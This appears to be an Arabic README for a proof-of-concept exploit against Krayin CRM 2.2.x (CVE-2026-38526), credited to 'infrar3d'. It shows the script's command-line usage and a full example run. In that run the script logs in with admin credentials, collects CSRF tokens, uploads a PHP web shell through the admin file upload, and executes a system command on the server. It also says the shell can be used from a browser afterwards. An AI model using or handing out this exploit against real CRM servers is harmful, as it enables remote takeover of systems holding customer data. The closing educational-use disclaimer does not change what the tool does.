
استغلال CVE-2026-38526 | بواسطة infrar3d
تم استغلالها بواسطة infrar3d
هذا هو إثبات مفهوم لتنفيذ التعليمات البرمجية عن بُعد (RCE) مصمم خصيصًا لنظام Krayin CRM الإصدار 2.2.x، وهو نظام مفتوح المصدر لإدارة علاقات العملاء. يقوم السكربت بأتمتة استغلال ثغرة رفع الملفات في الواجهة الإدارية لنظام إدارة علاقات العملاء (CRM) لتحقيق تنفيذ الأوامر عن بُعد على الخادم المستهدف.
python3 CVE-2026-38526.py --help
usage: CVE-2026-38526.py [-h] -rh RHOST -u USERNAME -p PASSWORD -c COMMAND
Krayin CRM RCE Exploit
options:
-h, --help show this help message and exit
-rh, --rhost RHOST Remote host
-u, --username USERNAME
Username or E-mail
-p, --password PASSWORD
Password
-c, --command COMMAND
Command to execute
python3 CVE-2026-38526.py -rh http://krayin.endpoint.site -u '[email protected]' -p 's3cur3-p4ss' -c 'id'
[*] Getting login page...
[+] CSRF Token: 3b438w26pvvr2rhWToWURhAhyGPdeWZm6DRShdUd
[*] Attempting login as: [email protected]...
[+] Redirect: http://krayin.endpoint.site/admin/dashboard
[+] Login successful!
[+] Session established successfully
[+] XSRF Token: eyJpdiI6ImVDY3h5c2dRdk5JS1NXaVdJaDJGdVE9PSIsInZhbH...
[*] Getting fresh CSRF token for upload...
[+] Found _token in modal
[+] Upload CSRF Token: ZQwH7QLajl5wZdNAOSX8Sk0v7z9spW1VYrw4VESW
[*] Uploading shell...
[+] Upload response status: 200
[+] File uploaded successfully!
[+] Location: http://krayin.endpoint.site/storage/tinymce/a9e2d9a51d41723acad27dc2c7ec861d.php
[*] Executing command: id
[+] Command output:
============================================================
uid=33(www-data) gid=33(www-data) groups=33(www-data)
============================================================
يقوم هذا السكربت برفع قشرة PHP cmd من revshells.com افتراضيًا.
بعد الاستغلال، يمكنك فتحها في المتصفح وإرسال الأوامر من صفحة الويب.
هذا البرنامج وكود إثبات المفهوم مقدم لأغراض التعليم والبحث فقط.
أنت مسؤول عن الامتثال لجميع القوانين المعمول بها. استخدمه بأخلاق ومسؤولية.